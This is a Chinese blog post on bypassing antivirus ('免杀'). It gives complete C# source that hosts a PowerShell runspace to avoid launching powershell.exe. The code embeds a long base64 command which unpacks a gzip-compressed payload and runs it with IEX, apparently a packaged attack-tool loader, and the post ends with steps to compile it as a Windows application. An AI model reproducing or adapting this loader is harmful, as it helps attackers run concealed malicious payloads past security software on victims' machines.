一种新的免杀方式

曾经终败给现在 2022-10-11 12:24 149阅读 0赞

### 文章目录 ###

*  原理
 *  遇到的坑
 *  代码
 *  具体操作
 *  参考文章

# 原理 #

利用c\#模拟powershell，执行命令。

# 遇到的坑 #

1.  用c\#调用system.management.automation.dll实现powershell并执行命令的时候，是在powershell中执行命令，不是在cmd中执行powershell +命令。这个很关键。因此无法添加任何的启动命令例如-w -nop等。
2.  解密-encodedcommand后面命令等代码：

$text = 'dwBoAG8AYQBtAGkAIAA='
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($text))

# 代码 #

[https://github.com/shanfenglan/nopowershell][https_github.com_shanfenglan_nopowershell]

using System.Collections.ObjectModel;
    using System.Management.Automation;
    using System.Management.Automation.Runspaces;
    using System.IO;
    using System;
    using System.Text;
    namespace PSLess
    { 
        class PSLess
        { 
            static void Main(string[] args)
            { 
                //if (args.Length == 0)
                    //Environment.Exit(1); //终止此进程并返回给操作系统错误代码1。
                string script = "[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(\"JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHkAQgByACsASABIADgARgBIADEASwBsAFYAbwB4AEIATQBVAFoAbgBhADYAcQBHAHEANABCAEEAVQBMAHgAbgBVAHkAbQBFAGwAbwBEAE4AdgBWAEYAeABaAC8ANwA3AE4AcQBqAFoAegBFADUAeQB6AGwAUwBkAFkAeABWAGwAZAAvAE4AZQBuAC8AZgBTAEwAdwBaAEEAdAB3AFoASwBYAEEAdQBwAG8AUQAyAEkAMgB4AGwASQBVAGoAYwBNAGkASABhAGwAYwBzADIARgBFAGkASwArAEUAdAArAHEAbABVADAAVwBXAEsAZwA0AEwAaABZAHYARABrAEEAdgBVAFIASgBhAEwANgBaAHQASgB5AEIATgBpAGIAOABxAFYANwBxAFoAbQBEADUAUgB1ADkANgBaAHkAWQBzAGYAMgBoAGsARQBEAGEATABjAEYASQBUAEEAegBoAEoAUQB2ADcAcQBxAFgASgBWAEgAVwBaAEMAYQBHAC8AQQBTAG0ATQBqAGQAZwBSAGMAZgBvAE4AZgBRAFQAcgBHAGkAMgBoAE0AZABSAFYAegBvAG0AMgA3AHcALwBPAFUATABtAHkAVQBKAEMATgBCAHAAMwB4AHcAQQBSAEsAYwBwADgATgBmAFEAQgBXAG0AdABUAG4AdwBuADUAcQA4AGcAQQBiAGUAUABhAHcAOQBZAGkAUABpAEwAdQBIADUAcABEAG0AQwA0AE4AdQBHAFoATABHAGQATgA2AHgAVQA3AFIAQQBkADIAOABVADQASgBMAGIAUAB3AG8ARwBsAEUAMABFAFcAMQA2AHAAOQAvAFYAdQB0AFAAdAA2ADMAbgBKAGgAOQBuAEoAawB4AHIAVgBTAE4AUABFAGYAQwBiAE4AbwBUAFYATwB2AEcAagBYAGkAaQBjADUAQgBHAG8AVgBWAFgAWABTAHMASQAwADMASwBEAG0AMwBBADIAbwBkAG4ATgBhAFcAcQArAFYAeABxAHMAbgAyADYAdgAxAHMAMgBkAE8AWgBHAEkALwBQAG4AZQB5AGsASAByAGkAcQBWAFgAeABVAHMAZgBZADAAQwBjAE0AcQB3ADMAaQBxAGQARAAzADkAUAB4AE0AZgBIAHUAegBaAHAAdwBGAHkAUABWAEIAVQB3AG8AUQBTAE0ATABJAEEATQBuAE8AdABVAEQAYQBGAE0AMwBBAGgAbQBBAE0ATgBwAGkAdABtAHUATAB3AEIAVQA2ADEAagBvADEASQBBAE0AcQBTAGcATABqAFkAZwB2AGwAMgA0AFIAYgBVAHIAbwBNAE0AdwBnAGEAVwArAC8AUwA3AGMAcAA5AHIARwB0AGgAZgB3AFAAMQBkAHAAdABwADcASgBrAHkAbABvADYAVABlAE8ATwBmAEUANwA4AEMAaABsAG4AbAB6AEUAbwBmAGQAKwBjAFgANgBkADgAbABWAHgANwA5AGYARQBxAHgAZQArAFYASAA1AEkARgBWAHQAQQBJAEYAagBJAHYAQwBDAE0ATAA3AHYAYwByAFYAeQBkAGYAVgBVAEwAZwBIADIAcAA2AGEASABxAFYAdgB5AGYAUwBYAEkAQgBxAEYAaQBJADAAdwBVAEoAbgBrAFIAegBrAG0AUwBnAGYAcgB6AFAALwBFADUAcQBiADEAdwBwAG8AMQBQAEIAYgBVAHUAWABHAGUAZQBVADMAaABPAGQAbgB3AGwAbgBtAGEAaABhAHoAOQBYAHIAdQBxAFYAYwAvAFkAVQA1AHkALwByAHoASQBVADIAUwBJAHIAMwBuADEAYwBEAEIAegBaAHUAQQBMAGcAOABNAEgAMwBYAHUAaQBSADgANwBhAE8AWQBnAFEAMABFAEoAUgA3AE4AQwA1AG0ARwA3AGEAeABWAHoAeQArAEEAegBaADMAUgBxAFIAYQBBAFAAdgAzAEsAeAB2AHMAdQBlAHUATgBsAFQAcwBiAFIARgBvADUANwBpAHEAMwBDAEsAVgBIAC8AMgBaAGgAVABEAEcAdABWAEsAVgBDAEIAagAvAEUANwA3AFgARwBhAFgAbQA5AHcAbQBZAEUATAA5AGIAbQAwADgAbwB2ADIAWQBsAC8AawBNAGcAdgBOAE4ARwAwAFEAZQBvAGIAcgAzAEcAbwBRAEIAagBBAGgAcwBCAHMARQBIAGEAVAB1ACsAUgBXAGQAbwBiAEIAYwBWAHYAOAB4AFYAOAAwAGcAYwBpADAAegBSAFIAZAB4AHoALwBVAFAASQBEADIAcgBaAHMATQBBAFYAMAB4AG0ANABlAGgAaQBHAEMAWgBHAEIAQwB6AFgAaABBAFUAcQBEAFUASgAwAGIAYwBEAGsAaAB1AHQAYwBUAEsAaAArAGkAQQBsAHIAUQBvAGgATABEAGsAdgBhADQAWgBqAGcAawB3AEkATABBAHgAVQA1AGsAOQBpAE4AZgArAGQASAB2AFcAawBBAEoAUABrAFIAQgBEADYAbQBMAHIAdQBRAEEARQAwAEgAOQA1AHgAegBSAFoAWABwAFoAagByAEEAcgB2ADQASABzAHkAOQAxAGMAaQBxAEsAQQBxAHMATABTAE8AKwBNAHgAZwBsAGcAdwBCAEEAMQBpAEoAbQBiAEkATgB6AFgAcQBvADEAZgBFAHUAOQAvAE0AKwAvAG4ARgB2AE8AVABtAFcAdwBDAHoAbwBHAHMAbABZAFgANAB4AE8AUwBvAEsASgBlAFMAMABpAG8AdQBsADYAOQB2AFcASgBiAEkASgBRAGkAagBKAGkAUwBoAHoANQBnAHAANgBIAGEATQBzAG8AMwBWAHEAbABRAHYAaQA2AFYAYwA5AFUAYgBkAFoATQBEAHYAQgBEAEUAVwArAFEAbAArAGQAdgBpAGgAWQBvAEYAWABGAEgAawBjAE0AVwBQAEYANAByAE4ASABYAFMAVABsAGoAVABUAHEAYwBaADEAcwBuADAAbgBaAGgAQwBFAHAAZwBjAFIAMAB4ADMAagBBAGIANgBUAGQAWQA3AGgAcwBaAFgANgBuAFoAVQBmAFMAVABzAE4AbgA2AFUATQBzAHAAcAB5ADAANAAyAGkAeABIAFkAZABDADEAMwBIADcAWgB6AGsAbgAvAHQARgA2ADMAMQBvAHYASgBPAEYAaABQAFIAQQA2ADQAaQB3AFYAQwBuAHAAUgAyAGoARgBDAHoAUABaAEQAdgBMADYAVABkAG0AdwBvAFkANwA1AGUATgB3AHEAWQB2AGQAMABCAHYATgB3AEYAQwA4AFgAYQBVADYAZwBIAFQATwBlAFEARAAyAGMAMwBCAHQAawBhAHoASABKAE4AbQBmAEcAUgBaAGcAUwAyAHMAbQA2AE4AQgBGAGsANwB0AG4AUABzAEUALwBiAEwAbwBNAFEAeABhAGUAUABIAE8ATQBEAFcAUABKAHgAWQAvAFQAUQBXAEMAMwA4AEIAbwA4AFIAVwBJAE0AdQBTAEsATwBjAEcASgBlAFYAUwByAHUAMAB0AEUAcABGAHgAYwBvAFMAVQB2AGoAcgBtAGMAUQAvAHoAYQB4ADIATQB5AGMASABJADEAWABHAG4AYQB4ACsAcwBoAGIAQwAzAEYAcABxAFMAaQAwAHQAdABnAEgAWABFADIAZAB6AHAAaQBKAG8AUwBIAG0AaABQADYAaQBhAGMAWQBkAGgASABZADMASgBvAEcAYQAwAFYAMwBKAGsATABxAHgALwBzAFMALwAyAEcAZgBkAGoAYgAwAC8AUgBSAG4AcQBBAGwAcABaAHQAKwBKADgAKwBEAHIAaQBGADUAMABrAEcAeABJAGoAUgBiAHkATgAzAEUAegBOAGwASQBjAGMARwBhADIAYQBCAEMAcgBxAHkAcwBIAEwAbgBQADQAegBXAFAARABxAFIAaABqAEgATQBiADYANABYAGkAaABCAHQAaQB2AFEARwByAHEAdABnAEgAOAAxADUAWQBiAGcARwBsAEQAKwBmAGEAMABhAEkAWQB4AGMAbwBUAHkAWgBWAHkAZgBkAGgAMQBzAGUAdwBlAFUAaQBsADgAegBnADMAdQBKADIAdQBLADkAawBJADAAdgBJAGQAagAyADEATABZAGQAcQByAE4AWgAzAHMAMwAxAEMAZQA3AEoAVwBNAHMANwBwAHoAOABaAHMAWgB3AEgAWQBhAG0AKwBYADIAYQAzAHQALwBkAEQATABzAEIAeABjADUAVwB0AEUASABkAEQALwBwAEcAYQA5AEIAQgBmAGYAOQBtAEMAZQAzAFYAVABOAFcATgBnAGUAZABLAEgAZAAxAHgAUwBYAG4AawBlAGMAZgBCAGMAYgA0AC8AcABCAEsAOABvAHkAZQB1ADEAcAA3AHkAcQB6AEgAbgB5AC8AeAA0ADIAMQBvAE0AUgBsAG8AMgBFAGUAQgB3AFEAdgBaAFoAagByAEUAMABmAHEAOABxAEkALwA3AHcATwBDAFgAbABoAGIARQBWADkAUABHAHIAdwA2ADAARABKAGwANAA1ADYAcABRAGIAcQAwAHUAYQBHAGcAOABuAFUAMQB1AGQAQwBUAFMAMwBYAGwAaQBjADQASgBEAEcAZwBOAGEAbwA2AFQAUQBTAEMAMwBrAG4ARwBXAEUAMgBOAEQAUgAzAHEARgBJACsAMgB4AEwAUQBKAEkAMABWADMAaAA5AGwANAB2AHoAZwBzAGQATgB4AHMAbQBEAEEAZgBxAE4AcgBhAGoAUgBBAFUANABlAHkAZAAwAGYAawBxADQAdQA0AGIAegBsAEMAaAA5ADAAeABJADMAbgBUAGQAMQBrAE8AOQBuAFkASgBIAEQAOQBRAE0AOQBEAHUAdABKAG0ASQBCAEgAbwB1AHIAZQBmAGgAdwAwAGoAcgB6AEgAcwA5AHMATwBvAEEAUwB1AG8AcwA1AHUAeQA5ADEAUgBzAHUASABuAFIARABIADgARgA4AE8AKwAxAHgAZABHAHUANwB6AEYAaQBSADcAagBuAEEAWQBXAEEAKwBZAG0AaAB6AHIALwBzADMAMAAvAFgARABkAHIAVwBaAHEAOQBZAFcAdABSACsAQgByAEEAZABkAGUAYQBPAEUAZgBVAEcAZQB5AHcAdgBtADAAQgA1ADUAZAArADAAcAA2ADgAVQBUAGEAUABTAG0AQQBwAHAAeAA2AFAAVgBoAHQAbQBUADcAMwBwADAAdABhAEcAMgBmADMAVgB2AFcAbwA3AC8AUwBIAGkAVgBEAHoAOABkAFcAUwBLAGwATwBXACsAcwBiAGIAcgBkAEQASAB0AHUAZQB1AEkAMQBjAEcAaAA1ADYAKwAvAHMAZQBhAGkAOQBhAHMAVAAwAGEAcgAzAHoAQgBpADkAcwBXAEUALwBxAHIAegBYAGEAVQBPAGsAQQA4AHUAQgAxAHkAeAB4AHcAZgBuAE0ARgA4AEYAaQArAHQAagBhAGMAeABRAFoAKwA5AFcAVQAxAFgAcABPAEUAdQBQAGEAUAAvAE8ASABjAFcATwBCAGUAMwAwAE0ATgA1AGYATQBRADUAcgBlAEQASABrADYAaQB4AEEAagByADIALwBvAEIAegBMAEoAWABEAG8AbABZADgAYQBSAGYAbAAxAGoARABoAGIAVAA3ADEAYQBMAHkAMwB4AEoAbQBpAHIAdQBmAHgAMwBqADYAMgBvADAAeABiADMASgB2AE8AVgBzAHAAWQBYAE8AUAByAEEAYgBqAGgAbABCAGcAOQA0AEwAeQBUAHgAdgB5AGUAbgBKAGYAeABlAHMAVAC8ARQAzAG4AUgBQAGoATgArAEoATQBiAEEAQQBIAHIAbAB2ADUAWABDAE4AcwB4AFQAZwBHAGEAdwBRAFgAUQBvAHAAaQBQAEgAWgAzADEAZgBBAEgAZgBJAEQARABnAEEAQQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==\"))";
                string s = RunScript(script);//执行script脚本并将返回值赋给s。
    	string s1 =  RunScript(s);
                Console.WriteLine(s1);//输出命令结果s。
            }
            private static string LoadScript(string filename)
            { 
                string buffer = "";
                try
                { 
                    buffer = File.ReadAllText(filename);//打开文件并读取文件中的所有文本并存储到buffer中然后关闭文件。
                }
                catch (Exception e) //catch块做异常处理
                { 
                    Console.WriteLine(e.Message);
                    Environment.Exit(2);//终止进程并抛出错误代码2给操作系统。
                }
                return buffer;//将buffer的值作为此函数的返回值。
            }
            private static string RunScript(string script)
            { 
                Runspace MyRunspace = RunspaceFactory.CreateRunspace();//创建一个runspace类，可以通过这个类来解析powershell脚本
                MyRunspace.Open();//执行powershell脚本前必须执行此函数
                Pipeline MyPipeline = MyRunspace.CreatePipeline(); //创建可以用来执行命令的管道类
                MyPipeline.Commands.AddScript(script);//添加一个新的脚本命令
                MyPipeline.Commands.Add("Out-String");//将执行命令后返回的对象转换为字符串数组，不加这一行的话返回值有时候会很奇怪，例如ls命令的返回值会有变化。
                Collection<PSObject> outputs = MyPipeline.Invoke();//执行命令，然后将结果转化为对象数组并返回
                MyRunspace.Close();//关闭runspace
                StringBuilder sb = new StringBuilder(); //这个类可以存储可变的字符串
                foreach (PSObject pobject in outputs) //遍历outputs
                { 
                    sb.AppendLine(pobject.ToString()); //将outputs里面所有的值转化为字符串类型并添加到sb对象的结尾。
                }
                return sb.ToString();//将sb里面的值转化为string类型并作为函数的返回值。 
            }
        }
    }

# 具体操作 #

1.  使用.net framework模版选择输出类型位windows应用程序，在引用中添加`C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll`这个dll文件：  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]
2.  将代码复制上去并编译即可。

# 参考文章 #

[PowerShell 技能连载 - 用 Base64 编解码文本][PowerShell _ - _ Base64]  
[不使用powershell执行powershell命令][powershell_powershell]

[https_github.com_shanfenglan_nopowershell]: https://github.com/shanfenglan/nopowershell
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: /images/20221005/c98fbffabff9431783ff2f8fa459f5b8.png
[PowerShell _ - _ Base64]: https://blog.vichamp.com/2016/01/01/encode-and-decode-text-as-base64/
[powershell_powershell]: https://decoder.cloud/2017/11/02/we-dont-need-powershell-exe/